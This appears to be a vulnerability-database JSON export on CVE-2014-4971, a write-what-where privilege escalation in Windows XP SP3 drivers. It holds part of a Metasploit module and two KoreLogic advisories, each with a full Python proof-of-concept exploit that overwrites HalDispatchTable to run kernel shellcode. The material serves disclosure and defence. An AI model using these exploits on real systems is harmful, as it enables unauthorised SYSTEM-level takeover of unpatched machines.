0x6000\r\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\r\n buf[0x5000, kernel_shell.length] = kernel_shell\r\n\r\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\r\n if result.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\r\n end\r\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\r\n\r\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\r\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\r\n\r\n print_status(\"Checking privileges after exploitation...\")\r\n\r\n unless is_system?\r\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\r\n end\r\n print_good(\"Privilege escalation successful!\")\r\n\r\n p = payload.encoded\r\n print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\r\n unless execute_shellcode(p)\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34982/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "\r\n\r\nTitle: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-003\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n\r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n\r\nOLLOWUP_IP: \r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an "up-platform"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n\r\n handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print "[+] Handle \\\\.\\MQAC @ %s" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\x50\x00\x00\x00"+"\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print "[+] HalDispatchTable+0x4 overwritten"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\r\n", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:DOC:30942", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30942", "title": "KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "BthPan.sys and MQAC.sys privilege escalation.", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:VULN:13881", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13881", "title": "Microsoft Windows XP privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "description": "\r\n\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any "up-platform" products. Says they\r\n are investigating embedded platforms. Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack) \r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p("\x00"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint "[!] Could not open handle to BthPan"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400\r\n WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\r\n", "edition": 1, "modified": "2014-07-22T00:00:00", "published": "2014-07-22T00:00:00", "id": "SECURITYVULNS:DOC:30943", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30943", "title": "KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-4133", "CVE-2014-4073", "CVE-2014-4140", "CVE-2014-4122", "CVE-2014-4121", "CVE-2014-4127", "CVE-2014-4138", "CVE-2014-4130", "CVE-2014-4141", "CVE-2014-4971", "CVE-2014-4126", "CVE-2014-4137", "CVE-2014-4128", "CVE-2014-4114", "CVE-2014-4129", "CVE-2014-4113", "CVE-2014-4148", "CVE-2014-4134", "CVE-2014-4132", "CVE-2014-4075", "CVE-2014-4115"], "description": "Restrictions bypass and memory corruptions in Internet Explorer, .Net code execution, TrueType embedded fonts code execution, OLE code execution, message queue service and FAT32 driver privilege escalation.", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:VULN:14016", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14016", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:17:07", "description": "No description provided by source.", "published": "2014-07-24T00:00:00", "type": "seebug", "title": "Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87151", "id": "SSV:87151", "sourceData": "\n """\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 